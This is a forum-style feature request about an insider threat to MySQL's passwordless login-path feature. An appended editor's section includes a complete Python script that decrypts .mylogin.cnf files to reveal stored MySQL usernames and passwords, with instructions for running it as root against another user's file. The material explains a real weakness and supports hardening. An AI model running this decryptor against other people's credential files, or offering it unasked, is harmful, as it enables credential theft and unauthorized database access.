I know this is a ridiculous suggestion, but I see a minor hole in the usage of the Passwordless Authentication protection method for MySQL 5.6+.
Only because my customer is who they are, they may suggest that the passwordless authentication is not bullet-proof if bash (or shell) history is enabled.
If an insider threat becomes the root user on Linux (I know, you have a BIG-ASS problem, but hear me out), then does a find for a file named .mylogin.cnf under /home, that person can now simply become that user using "su - username", search the user's bash history to find out what the "NAME" of the login-path is, and BAM, he's in as the MySQL root user.
Question: Can a future version of the passwordless authentication tool have an additional argument added to force the usage to also include a password or passphrase when gaining access to the .mylogin.cnf file?
This would be much like a fully encrypted gpg file where you must type the password in an interactive interface, where the user's shell history would not capture that information.
Thanks, I know it seems like overkill. For now we'll use gpg to protect any clear-text files that may contain connector information.
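Editor's note on the threat described above, with an added example that is not part of the original post and not code from MySQL. The shell-history step is a convenience, not a requirement: once root has done "su - username", "mysql_config_editor print --all" lists every login-path name in that user's .mylogin.cnf (passwords masked), and "mysql --login-path=NAME" uses it. More fundamentally, the MySQL documentation describes the file as obfuscated rather than encrypted: the 20-byte seed that the entries are scrambled with is stored in the file's own header, so anyone who can read the file can recover the clear-text user and password without any history at all. The parser below shows that format (header layout and key folding are facts about the file format; the decrypt step assumes the third-party "cryptography" package is installed, which is an assumption, and the sample bytes in the test are constructed). The practical consequence for the request in the post is that a passphrase prompt on .mylogin.cnf would have to replace this in-file seed as the key, which is exactly what the gpg workaround does today.

```python
"""Parse the MySQL 5.6+ .mylogin.cnf obfuscation format.

Added example (editor's code, not MySQL's). File layout written by
mysql_config_editor:
  bytes 0..3   unused (zeros)
  bytes 4..23  20-byte random seed, stored in clear
  then repeated: 4-byte little-endian length, followed by that many bytes
  of AES-128-ECB ciphertext (PKCS#7 padded), one config line per chunk.
The AES key is the 20-byte seed XOR-folded into 16 bytes, so the file
carries its own key: readable file == readable credentials.
"""
import struct
from typing import List

HEADER_UNUSED = 4
SEED_LEN = 20
AES_KEY_LEN = 16


def fold_key(seed: bytes) -> bytes:
    """Derive the 16-byte AES key the way MySQL's my_aes_create_key does (XOR fold)."""
    if len(seed) != SEED_LEN:
        raise ValueError("seed must be %d bytes" % SEED_LEN)
    key = bytearray(AES_KEY_LEN)
    for i, b in enumerate(seed):
        key[i % AES_KEY_LEN] ^= b
    return bytes(key)


def seed_of(blob: bytes) -> bytes:
    """The clear-text seed sitting right after the 4 unused header bytes."""
    if len(blob) < HEADER_UNUSED + SEED_LEN:
        raise ValueError("file too short to hold the header")
    return blob[HEADER_UNUSED:HEADER_UNUSED + SEED_LEN]


def split_chunks(blob: bytes) -> List[bytes]:
    """Return the raw ciphertext chunks that follow the header, validating lengths."""
    seed_of(blob)  # header length check
    pos = HEADER_UNUSED + SEED_LEN
    chunks = []
    while pos < len(blob):
        if pos + 4 > len(blob):
            raise ValueError("truncated length field at offset %d" % pos)
        (length,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        # Every chunk is whole AES blocks; anything else means corruption or a wrong offset.
        if length == 0 or length % AES_KEY_LEN != 0 or pos + length > len(blob):
            raise ValueError("bad chunk length %d at offset %d" % (length, pos - 4))
        chunks.append(blob[pos:pos + length])
        pos += length
    return chunks


def decrypt_mylogin(blob: bytes) -> str:
    """Return the clear-text config. Assumes the 'cryptography' package is installed."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    key = fold_key(seed_of(blob))
    lines = []
    for chunk in split_chunks(blob):
        dec = Cipher(algorithms.AES(key), modes.ECB()).decryptor()
        plain = dec.update(chunk) + dec.finalize()
        pad = plain[-1]
        if not 1 <= pad <= AES_KEY_LEN or plain[-pad:] != bytes([pad]) * pad:
            raise ValueError("bad PKCS#7 padding: corrupt chunk or unexpected format")
        lines.append(plain[:-pad].decode("utf-8"))  # each chunk is one line incl. newline
    return "".join(lines)


def login_path_names(cleartext: str) -> List[str]:
    """Section headers are the names accepted by 'mysql --login-path=NAME'."""
    names = []
    for ln in cleartext.splitlines():
        s = ln.strip()
        if s.startswith("[") and s.endswith("]"):
            names.append(s[1:-1])
    return names


if __name__ == "__main__":
    import os
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~/.mylogin.cnf")
    with open(path, "rb") as fh:
        text = decrypt_mylogin(fh.read())
    print("login paths:", ", ".join(login_path_names(text)))
    print(text, end="")
```

Run it as the target user (or as root against /home/username/.mylogin.cnf) to see exactly what an attacker with file access gets. Nothing here brute-forces anything: the only "secret" involved is read straight out of bytes 4..23 of the file, which is why file permissions (0600 and a home directory root cannot be stopped from reading) are the entire protection boundary for this feature.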